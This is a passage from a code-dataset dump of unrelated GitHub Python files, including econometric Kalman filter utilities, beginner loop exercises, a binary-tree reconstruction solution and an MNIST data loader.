y=40)\n\nventana.mainloop()","repo_name":"VTYTaquitos/Practica14to","sub_path":"tkinther/P13/contrase.py","file_name":"contrase.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70041786660","text":"stopwords = ['to', 'a', 'for', 'by', 'an', 'am', 'the', 'so', 'it', 'and', 'The']\nsent = \"The water earth and air are vital\"\nacro=\"\"\n#print(org.split(\" \"))\nfor word in sent.split(\" \"):\n if word not in stopwords:\n acro+=word[0].upper()+word[1].upper()+\". \"\n#jjacro.pop()\n\nprint(acro)\n\n\n","repo_name":"joselbr2099/PythonCurse","sub_path":"ejerCoursera/strings-list/ejer10.py","file_name":"ejer10.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7415889638","text":"'''\nSeparate functions used by the Robust class but for some reason not included\n'''\n\nimport numpy as np\nimport scipy as sp\nimport scipy.linalg as la\nimport quantecon as qe\nimport pandas as pd\nimport control as cont\nfrom scipy.stats import lognorm\nfrom scipy.interpolate import interp1d\n\n\n\ndef loglh(param, data, N=2, M=2, K=2, model = 'unrestricted'):\n return kalman_filter(param, data, N=N, M=M, K=K, model = model)[0]\n\n\ndef kalman_filter(param, data, N=2, M=2, K=2, model = 'unrestricted'):\n '''\n Objective function (for the NOT demeaned series),\n i.e. y_t = [log C_t, log P_t]^T without demeaning them\n\n Model:\n dy_{t+1} = beta0_D + beta1_D x_{t} + alpha_D w_{t+1}\n x_{t+1} = phi_D + kappa_D x_{t} + sigma_D w_{t+1}\n\n alpha_D w_{t+1} is the Wold error/whitened error\n Omega = alpha_D (alpha_D)^T is MxM\n '''\n data = np.atleast_2d(data)\n\n if model == 'restricted_1':\n phi_D, kappa_D, sigma_D, beta0_D, beta1_D, alpha_D = extract_params(param[:14], N, M, K, model = model)\n if len(param) == 14:\n MuX_inf = (np.eye(N) - kappa_D) @ phi_D\n x = MuX_inf\n elif len(param) > 14:\n x = param[-2:].reshape(N, 1)\n\n elif model == 'restricted_2':\n phi_D, kappa_D, sigma_D, beta0_D, beta1_D, alpha_D = extract_params(param[:13], N, M, K, model = model)\n# beta0_D = np.mean(data, 0).reshape((M, 1))\n if len(param) == 13:\n MuX_inf = (np.eye(N) - kappa_D) @ phi_D\n x = MuX_inf\n elif len(param) > 13:\n x = param[-2:].reshape(N, 1)\n\n elif model == 'restricted_3':\n phi_D, kappa_D, sigma_D, beta0_D, beta1_D, alpha_D = extract_params(param[:11], N, M, K, model = model)\n beta0_D = np.mean(data, 0).reshape((M, 1))\n if len(param) == 11:\n MuX_inf = (np.eye(N) - kappa_D) @ phi_D\n x = MuX_inf\n elif len(param) > 11:\n x = param[-2:].reshape(N, 1)\n\n Omega = alpha_D @ alpha_D.T\n T, m = data.shape\n\n try:\n #---------------------------------------------------------------------\n # Rule out \"bad scenarios\":\n # (1) the kappa_D matrix is unstable\n # (2) \"singular\" covariance matrix for the forecast error\n # (3) covariance matrices are not positive semidefinite\n cond1 = max(abs(la.eig(kappa_D)[0])) > 1\n cond2 = la.det(Omega) < 10e-50\n cond3 = min(la.eig(Omega)[0]) < 0 or min(la.eig(sigma_D @ sigma_D.T)[0]) < 0\n bad_scenario = any([cond1, cond2, cond3])\n\n if bad_scenario:\n return -10**6, np.nan*np.ones((N, T)), np.nan*np.ones((T, 1))\n else:\n llh = np.zeros((T, 1))\n XX = np.zeros((N, T + 1))\n\n XX[:, 0] = x.squeeze()\n invomega = la.inv(Omega)\n alphainv = la.inv(alpha_D)\n\n for tt in range(T):\n y = np.asarray([data[tt, :]]).T\n xL = x\n u = y - beta0_D - beta1_D @ xL\n x = phi_D + kappa_D @ 
xL + sigma_D @ (alphainv @ u)\n XX[:, tt+1] = x.squeeze()\n llh[tt] = -0.5*( m * np.log(2*np.pi) + np.log(la.det(Omega)) + u.T @ invomega @ u )\n\n return llh.sum()/T, XX[:, :-1], llh\n\n except ValueError:\n return -10**6, np.nan*np.ones((N, T)), np.nan*np.ones((T, 1))\n\n\ndef kalman_smoother(param, data, N=2, M=2, K=2, model = 'unrestricted'):\n '''\n Objective function (for the NOT demeaned series),\n i.e. y_t = [log C_t, log P_t]^T without demeaning them\n\n Model:\n dy_{t+1} = beta0_D + beta1_D x_{t} + alpha_D w_{t+1}\n x_{t+1} = phi_D + kappa_D x_{t} + sigma_D w_{t+1}\n\n alpha_D w_{t+1} is the Wold error/whitened error\n Omega = alpha_D (alpha_D)^T is MxM\n '''\n data = np.atleast_2d(data)\n\n if model == 'restricted_2':\n phi_D, kappa_D, sigma_D, beta0_D, beta1_D, alpha_D = extract_params(param[:13], N, M, K, model = model)\n if len(param) == 13:\n MuX_inf = (np.eye(N) - kappa_D) @ phi_D\n x = MuX_inf\n elif len(param) > 13:\n x = param[-2:].reshape(N, 1)\n\n elif model == 'restricted_3':\n phi_D, kappa_D, sigma_D, beta0_D, beta1_D, alpha_D = extract_params(param[:11], N, M, K, model = model)\n beta0_D = np.mean(data, 0).reshape((M, 1))\n if len(param) == 11:\n MuX_inf = (np.eye(N) - kappa_D) @ phi_D\n x = MuX_inf\n elif len(param) > 11:\n x = param[-2:].reshape(N, 1)\n\n T, m = data.shape\n\n\n # Matrices to store values\n X_now = np.zeros((N, T)) # E[x_{t} | F_t]\n X_next = np.zeros((N, T+1)) # E[x_{t+1} | F_t]\n P_now = np.zeros((N, N, T)) # P_{t|t}\n P_next = np.zeros((N, N, T+1)) # P_{t+1|t}\n\n Omega = alpha_D @ alpha_D.T\n invomega = la.inv(Omega)\n Q = sigma_D @ sigma_D.T\n\n # Initialize the Kalman filter (X_next[:, 0] is zero)\n P_next[:, :, 0] = qe.solve_discrete_lyapunov(kappa_D, Q)\n\n\n #-----------------------------------------------------\n # Kalman filter: (data: t)\n #-----------------------------------------------------\n for t in range(T):\n\n omega = beta1_D @ P_next[:, :, t] @ beta1_D.T + Omega\n invomega = la.inv(omega)\n y = np.asarray([data[t, :]]).T\n a = y - beta0_D - beta1_D @ X_next[:, t].reshape(N, 1)\n\n K_adj = (P_next[:, :, t] @ beta1_D.T) @ invomega\n X_now[:, t] = X_next[:, t] + (K_adj @ a).flatten()\n P_now[:, :, t] = P_next[:, :, t] - K_adj @ beta1_D @ P_next[:, :, t]\n\n X_next[:, t+1] = kappa_D @ X_now[:, t]\n P_next[:, :, t+1] = kappa_D @ P_now[:, :, t] @ kappa_D.T + Q\n\n\n #-------------------------------------------------\n # Backward step\n #-------------------------------------------------\n\n X_tT = np.zeros((N, T))\n P_tT = np.zeros((N, N, T))\n X_tT[:, -1] = X_now[:, -1]\n P_tT[:, :, -1] = P_now[:, :, -1]\n\n for t in range(T-2):\n J = P_now[:, :, -2-t] @ kappa_D.T @ P_next[:, :, -2-t]\n X_tT[:, -2-t] = X_now[:, -2-t] + J @ (X_now[:, -1-t] - X_next[:, -2-t])\n P_tT[:, :, -2-t] = P_now[:, :, -2-t] + J @ (P_now[:, :, -1-t] - P_next[:, :, -2-t]) @ J.T\n\n return X_tT, P_tT\n\n\n\ndef xi_restrictions(x_vec, case = 0):\n\n if case == 0:\n params = x_vec\n elif case == 1:\n params = np.asarray([x_vec[0], 0.0, 0.0, 0.0, 0.0, 0.0])\n elif case == 2:\n params = np.asarray([0.0, 0.0, 0.0, x_vec[0], 0.0, x_vec[1]])\n elif case == 3:\n params = np.asarray([x_vec[0], 0.0, 0.0, x_vec[1], 0.0, x_vec[2]])\n elif case == 4:\n params = np.asarray([0.0, 0.0, 0.0, x_vec[0], x_vec[1], x_vec[2]])\n elif case == 5:\n params = np.asarray([x_vec[0], 0.0, 0.0, x_vec[1], x_vec[2], x_vec[3]])\n elif case == 6:\n params = np.asarray([x_vec[0], x_vec[1], x_vec[2], x_vec[3], -x_vec[1]*x_vec[2]/x_vec[3], x_vec[4]])\n\n return params\n\ndef make_Xi(params):\n '''\n 
Parameterize the positive semidefinite symmetric matrix by its square root\n almost Cholesky...diagonal elements should be strictly positive\n '''\n xi_sq = np.asarray([[params[0], 0, 0],\n [params[1], params[3], 0],\n [params[2], params[4], params[5]]])\n return xi_sq @ xi_sq.T\n\n\ndef extract_xi(param_xi):\n Xi = np.asarray([[ param_xi[0], 0.0, 0.0],\n [2*param_xi[1], param_xi[3], 0.0],\n [2*param_xi[2], param_xi[4], param_xi[5]]])\n\n Xi_sym = (.5)*(Xi + Xi.T)\n xi_0 = param_xi[0]\n xi_1 = np.asarray([[param_xi[1]], [param_xi[2]]])\n xi_2 = np.asarray([ [param_xi[3], 0.0], [param_xi[4], param_xi[5]] ])\n\n return xi_0, xi_1, xi_2, Xi_sym\n\ndef extract_params(param, N=2, M=2, K=2, model = 'unrestricted'):\n \"\"\"\n (1) Unrestricted model: (length of param = N+N*N+N*K+M*N+M+M*K = 20)\n param = phi, kappa, sigma, beta0, beta1, alpha\n The first M elements are for phi, the next NxN elements are for kappa, the next NxK elements are sigma\n The next M are for beta0, the next MxN are for beta1, the remaining MxK are for alpha\n\n (2) Restricted 1 model: (length of param = N*N + N*K + M + M*K = 14)\n param = kappa, sigma, beta0, lt(alpha)\n\n (3) Restricted 2 model: (length of param = N*N + N*K + M + (M*K-1) = 13)\n param = kappa, sigma, beta0, lt(alpha)\n\n (4) Restricted 3 model: (length of param = N*N + (N*K-1) + (M*K-1) = 10)\n param = kappa, sigma, lt(alpha)\n \"\"\"\n\n if model == 'unrestricted' and len(param) == N+N*N+N*K+M*N+M+M*K:\n phi = param[:N].reshape(N, 1)\n kappa = param[N:N+N*N].reshape(N, N)\n sigma = param[N+N*N:N+N*N+N*K].reshape(N, K)\n\n beta0 = param[N+N*N+N*K:N+N*N+N*K+M].reshape(M, 1)\n beta1 = param[N+N*N+N*K+M:N+N*N+N*K+M*N+M].reshape(M, N)\n alpha = param[N+N*N+N*K+M*N+M:N+N*N+N*K+M*N+M+M*K].reshape(M, K)\n\n return phi, kappa, sigma, beta0, beta1, alpha\n\n elif model == 'restricted_1' and len(param) == N*N+N*K+M+M*K:\n phi = np.zeros((N, 1))\n kappa = param[:N*N].reshape(N, N)\n sigma = param[N*N:N*N+N*K].reshape(N, K)\n\n beta0 = param[N*N+N*K:N*N+N*K+M].reshape(M, 1)\n beta1 = np.eye(M)\n alpha = param[N*N+N*K+M:N*N+N*K+M+M*K].reshape(M, K)\n\n return phi, kappa, sigma, beta0, beta1, alpha\n\n elif model == 'restricted_2' and len(param) == N*N+N*K+M+M*K-1:\n phi = np.zeros((N, 1))\n kappa = param[:N*N].reshape(N, N)\n sigma = param[N*N:N*N+N*K].reshape(N, K)\n\n# resolv = np.eye(N) - kappa\n# kappa_C = -la.logm(kappa)\n# kappa_inv = la.inv(kappa_C)\n# beta1 = kappa_inv @ resolv\n\n beta0 = param[N*N+N*K:N*N+N*K+M].reshape(M, 1)\n beta1 = np.eye(M)\n aa = param[N*N+N*K+M:N*N+N*K+M+M*K-1]\n alpha = np.asarray([[aa[0], 0.0],[aa[1], aa[2]]])\n\n return phi, kappa, sigma, beta0, beta1, alpha\n\n elif model =='restricted_3' and len(param) == N*N+N*K+M*K-1:\n phi = np.zeros((N, 1))\n kappa = param[:N*N].reshape(N, N)\n sigma = param[N*N:N*N+N*K].reshape(N, K)\n\n beta0 = np.zeros((M, 1))\n beta1 = np.eye(M)\n aa = param[N*N+N*K:N*N+N*K+M*K-1]\n alpha = np.asarray([[aa[0], 0.0],[aa[1], aa[2]]])\n\n return phi, kappa, sigma, beta0, beta1, alpha\n\n else:\n raise ValueError(\"The specification is not consistent with the length of param!\")\n\n\ndef build_params(phi, kappa, sigma, beta0, beta1, alpha):\n \"\"\"\n The inverse of extract_params\n \"\"\"\n N, K = sigma.shape\n M = phi.shape[0]\n\n params = np.hstack([np.reshape(phi, (N,) ),\n np.reshape(kappa, (N*N,) ),\n np.reshape(sigma, (N*K,) ),\n np.reshape(beta0, (M,) ) ,\n np.reshape(beta1, (M*N,) ),\n np.reshape(alpha, (M*K,) )])\n\n return params\n\n\ndef from_discrete_to_cont(phi_D, kappa_D, sigma_D, beta0_D, 
beta1_D, alpha_D):\n\n tau = 1\n N, K = sigma_D.shape\n M = beta1_D.shape[0]\n\n kappa = -la.logm(kappa_D) / tau\n if type(kappa[0,0])== np.complex128:\n raise ValueError(\"kappa is complex\")\n\n kappa_inv = la.inv(kappa)\n\n vecSigma = (sigma_D @ sigma_D.T).flatten('F')\n KK = np.kron(kappa, np.eye(N)) + np.kron(np.eye(N), kappa)\n sigma2 = np.reshape( la.inv( np.eye(N * N) - la.expm(-KK * tau) ) @ KK @ vecSigma, (N, N))\n\n try:\n sigma = np.linalg.cholesky(sigma2)\n except np.linalg.LinAlgError:\n raise ValueError(\"Sigma2 is not positive definite\")\n\n resolv = np.eye(N) - kappa_D\n mu = resolv @ phi_D\n phi = kappa @ mu\n\n beta1 = beta1_D @ la.inv(resolv) @ kappa\n beta0 = beta0_D/tau - (beta1 @ (np.eye(N) - kappa_inv @ resolv ) @ mu)\n\n #def finding_alpha(param):\n # alpha = np.asarray([[param[0], 0], [param[1], param[2]]])\n # vecSigma = (sigma @ sigma.T).flatten('F')\n\n # const = beta1 @ kappa_inv @ sigma + alpha\n # integ = kappa_inv @ resolv\n # integ_transpose = (np.eye(N) - la.expm(-kappa.T*tau)) @ kappa_inv.T\n # Q_c = kappa_inv @ sigma @ sigma.T @ kappa_inv.T\n # vecQ = Q_c.flatten('F')\n\n # first_term = (const @ const.T)*tau\n # second_term = - const @ ( sigma.T @ kappa_inv.T @ integ_transpose @ beta1.T )\n # third_term = - ( beta1 @ integ @ kappa_inv @ sigma ) @ const.T\n # fourth_term = beta1 @ np.reshape( la.inv( KK ) @ (np.eye(N*N) - la.expm(-KK*tau)) @ vecQ ,(N,N)) @ beta1.T\n\n # alpha2_alter = first_term + second_term + third_term + fourth_term\n\n # return (alpha_D - np.linalg.cholesky(alpha2_alter)).flatten()[[0,2,3]]\n\n #try:\n # sol = sp.optimize.root(finding_alpha, (alpha_D - np.eye(N)/1000).flatten()[[0, 2, 3]] )\n # alpha_p = sol.x\n # alpha = np.asarray([[alpha_p[0], 0], [alpha_p[1], alpha_p[2]]])\n #except TypeError:\n # raise ValueError(\"Problem with the solver\")\n\n# return phi, kappa, sigma_D, beta0, beta1, alpha_D\n return phi, kappa, sigma, beta0, beta1, alpha_D\n\n\ndef NBER_Shade(ax, start_date, date_file):\n \"\"\"\n This function adds NBER recession bands to a Matplotlib Figure object.\n ax : axis\n start_date : start date for the sample, form: yyyy-mm-dd\n \"\"\"\n\n # load the NBER recession dates\n NBER_Dates = pd.read_csv(date_file)\n sample_1 = pd.Timestamp(start_date) <= pd.DatetimeIndex(NBER_Dates['Peak'])\n sample_2 = pd.Timestamp(start_date) <= pd.DatetimeIndex(NBER_Dates['Trough'])\n NBER_Dates = NBER_Dates[sample_1 + sample_2]\n\n # for loop generates recession bands!\n for i in NBER_Dates.index:\n ax.axvspan(NBER_Dates['Peak'][i], NBER_Dates['Trough'][i],\n facecolor='grey', alpha=0.15)\n\n\ndef quadratic(x1, x2, xi0, xi1, xi2):\n val = xi0 + 2*(xi1[0]*x1 + xi1[1]*x2) + (x1**2)*xi2[0] + (x2**2)*xi2[2] + (x1*x2)*xi2[1]\n val[val < 0] = np.nan\n\n return val\n\n\ndef autocorr_gradient(estimates):\n Ex2, Ey2, Exxj, Exyj, Eyxj, Eyyj = estimates\n\n sig_x = np.sqrt(Ex2)\n sig_y = np.sqrt(Ey2)\n der_x = -(.5)/(sig_x**3 * sig_y)\n der_y = -(.5)/(sig_x * sig_y**3)\n\n ACF = np.asarray([Exxj/Ex2,\n Exyj/(sig_x * sig_y),\n Eyxj/(sig_x * sig_y),\n Eyyj/Ey2])\n\n G = np.asarray([[-Exxj/(Ex2**2), 0, 1/Ex2, 0, 0, 0],\n [ Exyj * der_x, Exyj * der_y, 0, 1/(sig_x*sig_y), 0, 0],\n [ Eyxj * der_x, Eyxj * der_y, 0, 0, 1/(sig_x*sig_y), 0],\n [ 0, -Eyyj/(Ey2**2), 0, 0, 0, 1/Ey2]])\n return ACF, G\n\n\n\ndef NW_se(data, k):\n \"\"\"\n This function computes GMM standard errors for the mean and standard deviation estimators\n \"\"\"\n\n data = np.atleast_2d(data)\n data = data[np.isfinite(data)]\n T = max(data.shape)\n data = data.reshape(T, 1)\n\n 
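# Point estimates first (NaN-robust mean and std); the lag loop below applies
# Bartlett/Newey-West weights 2*(1 - i/k) to build the long-run covariance S
# that feeds the GMM variance V = inv(d_hat' inv(S) d_hat).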
gmm_mean = np.nanmean(data)\n gmm_stdev = np.nanstd(data)\n\n d_hat = np.asarray([[-1, 0], [0, -2*gmm_stdev]])\n\n f1 = data - np.ones((T, 1))*gmm_mean\n f2 = (data - np.ones((T, 1))*gmm_mean)**2 - np.ones((T, 1))*gmm_mean**2\n f = np.hstack([f1, f2])\n\n R = (f.T @ f)/T\n\n for i in range(1, k):\n R_temp = (f[i:, :].T @ f[:-i, :])/T\n R += 2 * (1 - i/k) * R_temp\n\n S = R\n\n V = np.linalg.inv(d_hat.T @ np.linalg.inv(S) @ d_hat)\n\n return np.asarray([gmm_mean, gmm_stdev]), np.sqrt(np.diag(V)/T)\n\ndef NW_corr(data, k):\n \"\"\"\n This function computes GMM standard errors for the mean and standard deviation estimators\n \"\"\"\n\n data = np.atleast_2d(data)\n T = max(data.shape)\n data = data.reshape(T, 2)\n data = data - data.mean(0)\n\n Ex2 = np.mean(data[:, 0]**2)\n Ey2 = np.mean(data[:, 1]**2)\n Exy = np.mean(data[:, 0] * data[:, 1])\n\n f1 = (data[:, 0]**2 - Ex2).reshape(T, 1)\n f2 = (data[:, 1]**2 - Ey2).reshape(T, 1)\n f3 = (data[:, 0] * data[:, 1] - Exy).reshape(T, 1)\n\n f = np.hstack([f1, f2, f3])\n R = (f.T @ f)/T\n\n for i in range(1, k):\n R_temp = (f[i:, :].T @ f[:-i, :])/T\n R += 2 * (1 - i/k) * R_temp\n\n V = R\n\n d_hat = np.asarray([[-0.5*Exy/Ex2**(3/2)/np.sqrt(Ey2), -0.5*Exy/np.sqrt(Ex2)/Ey2**(3/2), 1/np.sqrt(Ex2)/np.sqrt(Ey2)]])\n\n\n return Exy/np.sqrt(Ex2)/np.sqrt(Ey2), np.sqrt(d_hat @ V @ d_hat.T/T)[0]\n\n\ndef autocorrelation(data, nn, NW_lags):\n T, M = data.shape\n data = np.asarray(data - data.mean(0))\n\n store_est = np.zeros((nn + 1, 3*M))\n store_acorr = np.zeros((nn + 1, M*M))\n store_se = np.zeros((nn + 1, M*M))\n\n\n for j in range(nn + 1):\n numb_obs = T - j\n store_uu = np.zeros((3*M, numb_obs))\n\n u_Ex2 = data.T[0, j:]**2\n u_Ey2 = data.T[1, j:]**2\n store_est[j, 0] = u_Ex2.mean()\n store_est[j, 1] = u_Ey2.mean()\n\n store_uu[0, :] = u_Ex2 - store_est[j, 0]\n store_uu[1, :] = u_Ey2 - store_est[j, 1]\n\n for m in range(M):\n for k in range(M):\n xt_ytj = data[j:, m] * data[:T-j, k]\n acov_gmm = xt_ytj.mean()\n u = (xt_ytj - acov_gmm).reshape(T-j, 1)\n store_uu[2 + 2*m + k, :] = u.T\n store_est[j, 2 + 2*m + k] = acov_gmm\n\n R = (store_uu @ store_uu.T)/numb_obs\n\n for i in range(1, NW_lags):\n R_temp = (store_uu[:, i:] @ store_uu[:, :-i].T)/numb_obs\n R += 2 * (1 - i/NW_lags) * R_temp\n\n store_acorr[j, :], G = autocorr_gradient(store_est[j, :])\n store_se[j, :] = np.sqrt(abs(np.diag((G @ R @ G.T))/numb_obs))\n\n LB = store_acorr - 2*store_se\n UB = store_acorr + 2*store_se\n\n return store_acorr, LB, UB\n\ndef autocorr_model(kappa, sigma, model2, isnn):\n\n N, M, K = 2, 2, 2\n\n b = model2.zero_coupon_yields(tau=4, worstcase=1)[1:].reshape(2, 1)\n db = model2.zero_coupon_yields(tau=20, worstcase=1)[1:].reshape(2, 1) - model2.zero_coupon_yields(tau=4, worstcase=1)[1:].reshape(2, 1)\n\n beta1 = np.vstack([b.T, db.T]) @ kappa\n sigma = sigma*100\n alpha = np.vstack([b.T, db.T]) @ sigma\n\n cov_array = np.zeros((nn + 1, M, M))\n Exx, G, L = cont.dare(kappa.T, np.zeros((N, N)), sigma @ sigma.T, np.eye(N))\n cov_array[0, :, :] = beta1 @ Exx @ beta1.T + alpha @ alpha.T\n\n for j in range(1, nn + 1):\n cov_array[j, :, :] = beta1 @ np.linalg.matrix_power(kappa, j-1) @ (kappa @ Exx @ beta1.T + sigma @ alpha.T)\n\n acorr_model = np.zeros((nn + 1, 2, 2))\n\n acov_model = cov_array\n sig_x, sig_y = np.sqrt(acov_model[0, 0, 0]), np.sqrt(acov_model[0, 1, 1])\n sigmas = np.asarray([[sig_x*sig_x, sig_x*sig_y],\n [sig_y*sig_x, sig_y*sig_y]])\n\n for i in range(nn + 1):\n acorr_model[i, :, :] = acov_model[i, :, :]/sigmas\n\n return acorr_model\n\n\ndef FB_bootstrap(yy, 
xx):\n \"\"\"\n This function implements the so called \"bootstrapping\" method to turn par yields\n into zero coupon yields.\n\n Arguments:\n yy : list of par yields with different maturities (in quarters)\n ascending order for a given date t\n xx : list of corresponding maturities (in quarters!)\n\n NOTE: We need this bacause the survey questions refer to\n Treasury par (CMT) yields. But the affine term structure model is affine only in\n zero-coupon yields (not par yields). They are actually quite close, so hopefully\n the approximation error is small.\n \"\"\"\n yy = np.asarray(yy)\n\n #---------------------------------\n # Take care of the NaNs\n #---------------------------------\n if np.isnan(yy)[-1]==True:\n yy[-1] = yy[-2] #+ (yy[-2] - yy[-3])\n nan = np.isnan(yy)\n nonan = np.array([not e for e in nan])\n\n #---------------------------------\n # \"Bootstrapping\" Fama and Bliss\n #---------------------------------\n\n par = interp1d(xx[nonan], yy[nonan])\n z_rate = 1 + yy/200\n zeroc = np.asarray(par(2))\n\n for ytm in np.arange(2, 61)*2:\n ind = int(ytm/2)\n cc = (par(ytm)/2) * np.ones(ind)\n cc[-1] += 100\n new_zero = ((cc[-1]/(100 - sum((1 + zeroc/200)**(-np.arange(1, ind)) * cc[:-1])))**(1/ind) - 1)*200\n zeroc = np.hstack([zeroc, new_zero])\n\n return zeroc\n\n\ndef nan_interpolator(y):\n \"\"\"Helper to handle indices and logical indices of NaNs.\n\n Input:\n - y, 1d numpy array with possible NaNs\n Output:\n - nans, logical indices of NaNs\n - index, a function, with signature indices= index(logical_indices),\n to convert logical indices of NaNs to 'equivalent' indices\n \"\"\"\n y = np.asarray(y)\n\n nans, x = np.isnan(y), lambda z: z.nonzero()[0]\n y[nans]= np.interp(x(nans), x(~nans), y[~nans])\n\n return y\n","repo_name":"szokeb87/estimating_robustness","sub_path":"code/robust_utils.py","file_name":"robust_utils.py","file_ext":"py","file_size_in_byte":20787,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"1020433440","text":"x =0\r\n\"\"\"\r\nwhile x <100:\r\n if(x%2==0):\r\n print(f\"sayi cift: {x}\")\r\n else:\r\n print(f\"sayi tek: {x}\")\r\n x =x+1\r\nprint(\"done...\")t\r\n\"\"\"\r\nname =\"\" #false\r\nwhile not name:\r\n name=input(\"enter your name\")\r\nprint(f\"Merhaba, {name}\")\r\nsayilar =[1,3,5,7,9,12,19,11]\r\ni=0\r\nwhile (i0:\r\n print(k)\r\n k-=5\r\nnmuberss =[]\r\nsay =0\r\nwhile say<5:\r\n nsay=int(input(\"sayi \"))\r\n nmuberss.append(nsay)\r\n say +=1\r\nprint(nmuberss)\r\n\"\"\"\r\nproducts =[]\r\ncount = int (input (\"how many have you wanna add\"))\r\nl=0\r\nwhile(l 0:\n test_data = prepare_data_masks(data, test_ind, print_params = print_params)\n else:\n test_data = torch.empty()\n print(df)\n return train_data, test_data, df\n\n\n\n\nif __name__ == \"__main__\":\n\n config = configs.ConfigBase()\n df = dataloading.load_navco(G_range=[5.0, 0.0], Q_thresh=2.0, Q_log=False, T_rank=0)\n train_data, test_data, df = prepare_df(df, print_params = True)\n print(df)\n print(train_data)\n\n\n","repo_name":"niklasstoehr/ordinal-conflict-intensity","sub_path":"g1data/g1data/dataprepping.py","file_name":"dataprepping.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"40585964878","text":"# Good morning! 
Here's your coding interview problem for today.\n\n# This problem was asked by Google.\n\n# Given pre-order and in-order traversals of a binary tree, write a function to reconstruct the tree.\n\n# For example, given the following preorder traversal:\n\n# [a, b, d, e, c, f, g]\n\n# And the following inorder traversal:\n\n# [d, b, e, a, f, c, g]\n\n# You should return the following tree:\n\n# a\n# / \\\n# b c\n# / \\ / \\\n# d e f g\n\n\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\ndef build_tree(preorder, inorder):\n if not preorder or not inorder:\n return None\n\n root_val = preorder[0]\n root = TreeNode(root_val)\n root_index = inorder.index(root_val) \n\n left_subtree_inorder = inorder[:root_index] \n right_subtree_inorder = inorder[root_index + 1:] \n\n left_subtree_preorder = preorder[1:1 + len(left_subtree_inorder)]\n right_subtree_preorder = preorder[1 + len(left_subtree_inorder):]\n\n root.left = build_tree(left_subtree_preorder, left_subtree_inorder)\n root.right = build_tree(right_subtree_preorder, right_subtree_inorder)\n\n return root\n\ndef reconstruct_tree(preorder, inorder):\n return build_tree(preorder, inorder)\n\n\ndef print_tree(root):\n if root is None:\n return\n \n print(root.val)\n print_tree(root.left)\n print_tree(root.right)\n \n\n\n# test\npreorder = ['a', 'b', 'd', 'e', 'c', 'f', 'g']\ninorder = ['d', 'b', 'e', 'a', 'f', 'c', 'g']\n\ntree = reconstruct_tree(preorder, inorder)\n\nprint_tree(tree)\n","repo_name":"mouli-dutta/Daily-Coding-Problems","sub_path":"DailyCodingProblem48.py","file_name":"DailyCodingProblem48.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
{"seq_id":"30829533849","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 12 14:45:13 2019\r\n\r\n@author: Shrutika\r\n\"\"\"\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\ndt=pd.read_csv(r'C:\\Users\\Shrutika\\Desktop\\spyder programs\\EDA-Datasets\\Insurance.csv')\r\ndt.columns\r\ndt.shape\r\ndt.head()\r\ndt.tail()\r\ndt['Y']=dt['Y'].str.replace('','')","repo_name":"Pratiksakpal16/ml-algorthms","sub_path":"insurance.py","file_name":"insurance.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"71590923621","text":"import os\nimport re\n\nimport numpy as np\nfrom PIL import Image\nfrom sklearn.preprocessing import OneHotEncoder\n\n\ndef load_data(image_dir, one_hot_encoder=None):\n \"\"\"Load the MNIST-digit images and labels from a given path.\"\"\"\n\n image_names = os.listdir(image_dir)\n N = len(image_names)\n\n # List of images.\n X = np.empty((N, 28, 28, 1))\n # List of labels.\n y = np.empty((N, 1), dtype=str)\n\n \"\"\"\n Regex to extract the label from the filename.\n\n Filenames are of the form UniqueId_Label.png where UniqueId is just a unique number identifying an image\n and Label is the digit that is represented in the image.\n \"\"\"\n label_regex = re.compile(r\"\\d+_(\\d)\")\n\n for i, image_name in enumerate(image_names):\n # Load the image.\n image_path = os.path.join(image_dir, image_name)\n image = Image.open(image_path)\n # Get the label.\n label = label_regex.match(image_name)[1]\n\n # Convert from image file to array.\n image_array = np.asarray(image)\n image_array = image_array.astype('float32')\n # Normalize all values to [0; 1)\n image_array = image_array / 255\n\n # Add sample to the list.\n X[i, ...] 
= np.expand_dims(image_array, axis=-1)\n y[i, 0] = label\n\n \"\"\"\n The encoder performs what is called \"one-hot encoding\".\n\n It's a standard way to represent categorical data in Machine Learning. If our data can be one of N classes\n then we will represent the n-th label as a vector of length N with all 0 values except for the n-th which will be 1.\n This is done because the model can only predict numerical values and labels are not (strictly) numerical.\n\n Example\n If the classes are [\"cat\", \"dog\", \"table\"] then N = 3\n \"cat\" => [1, 0, 0]\n \"dog\" => [0, 1, 0]\n \"table\" => [0, 0, 1]\n\n You can read more about it here:\n https://machinelearningmastery.com/one-hot-encoding-for-categorical-data/\n https://machinelearningmastery.com/why-one-hot-encode-data-in-machine-learning/\n \"\"\"\n if one_hot_encoder is None:\n one_hot_encoder = OneHotEncoder()\n one_hot_encoder.fit(y)\n\n y = one_hot_encoder.transform(y)\n\n # The encoder obect must be returned as it will be used to decode the predictions at the end.\n return X, y, one_hot_encoder\n\n\ndef load_dataset(data_dir):\n \"\"\"Load both training and testing data.\"\"\"\n\n train_dir = os.path.join(data_dir, \"training\")\n test_dir = os.path.join(data_dir, \"testing\")\n\n X_train, y_train, one_hot_encoder = load_data(train_dir)\n X_test, y_test, _ = load_data(test_dir, one_hot_encoder)\n\n return (X_train, y_train), (X_test, y_test), one_hot_encoder\n","repo_name":"imanlab/iml_dl_tutorial","sub_path":"examples/mnist-digits-cnn/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"1591603860","text":"from database import DatabaseConnection\nfrom player import Player\nfrom commands import CommandInterpreter\n\n\nclass Game(CommandInterpreter):\n player = None\n enemies = []\n\n def __init__(self):\n super(CommandInterpreter, self).__init__()\n self.db_connection = DatabaseConnection()\n pass\n\n def start(self):\n print('Jogo 